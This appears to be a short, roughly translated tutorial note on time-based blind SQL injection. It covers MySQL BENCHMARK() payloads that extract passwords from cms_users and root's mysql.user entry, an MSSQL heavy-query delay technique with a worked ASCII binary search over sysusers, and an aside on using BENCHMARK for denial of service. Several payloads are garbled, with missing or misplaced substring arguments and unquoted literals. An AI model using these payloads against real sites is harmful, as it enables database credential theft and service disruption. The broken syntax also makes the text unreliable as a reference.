Time-based SQL blind injection-benchmark Function

I read the article in blind SQL injection and made several records

---------------------------------------------------- MYSQL time difference injection ----------------------------------------------------------

You can see the following descriptions in the MySQL reference manual:

------------------------------------------------
BENCHMARK (count, expr)
The BENCHMARK () function repeats the countTimes execution expression expr, which can be used to time how fast the MySQL processing expression is. The result value is always 0. Intended for mysql customers, it reports the query execution time.

Attack principle when BENCHMARK (1000000, expr) is run, the SQL query takes a long time to complete.

Use the following statement

This statement calls benchmark directly in the select clause. If the ascii code value of username is 97, benchmark is executed.

Id = 1 union select 1, benchmark (1000000, md5 (test), 1 from user where userid = 1 and ord (substring (username,) = 97 /*

Or:

This query is easier to understand. If the first character of the password is A, benchmark will be executed.

Id = 1 union select if (substring (password, 10000000) = A, benchmark (, sha (1), 0) username, password from cms_users where username = admin /*

If the root user sends a blind note to query the root password:

Id = 1 union select if (substring (Password, 10000000) = a, benchmark (, sha (1), 0) User, Password from mysql. user where user = root /*

Lab details

 

Next, change the parameters of substring (password, 2, 1) to gradually guess the result.

Ps: If BENCHMARK (count, expr) has a very large count value, a ddos attack can be constructed!

---------------------------------------------------- MSSQL time difference injection ----------------------------------------------------------

This technology is provided by chema alonso Microsoft Security mvp

Site.com/news.aspx? Id = 1 and (SELECT count (*) FROM sysusers as sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers as sys5, sysusers as sys6, sysusers as sys7, sysusers as sys8)> 1 and 300> (select top 1

Ascii (substring (name, 1, 1) from sysusers)

If the ascii value of the first character of the name field is less than 300, the query response will be delayed by about 14 seconds.

Continue as follows:

[...]> 1 and 300> (select top 1 ascii (substring (name,) from sysusers) → 14

Seconds TRUE →

[...]> 1 and 0> (select top 1 ascii (substring (name, 1, 1) from sysusers) → 1 second →

FALSE

[...]> 1 and 150> (select top 1 ascii (substring (name,) from sysusers) → 14

Seconds TRUE →

[...]> 1 and 75> (select top 1 ascii (substring (name, 1, 1) from sysusers) → 1 second →

FALSE

[...]> 1 and 100> (select top 1 ascii (substring (name,) from sysusers) → 1 second

FALSE →

[...]> 1 and 110> (select top 1 ascii (substring (name,) from sysusers) → 1 second

FALSE →

[...]> 1 and 120> (select top 1 ascii (substring (name,) from sysusers) → 14 seconds

TRUE →

[...]> 1 and 115> (select top 1 ascii (substring (name,) from sysusers) → 1 second

FALSE →

[...]> 1 and 118> (select top 1 ascii (substring (name,) from sysusers) → 1 second

FALSE →

[...]> 1 and 119> (select top 1 ascii (substring (name,) from sysusers) → 1 second

FALSE →

Then the result is ASCII (119) = w.

Start with the second letter... and so on!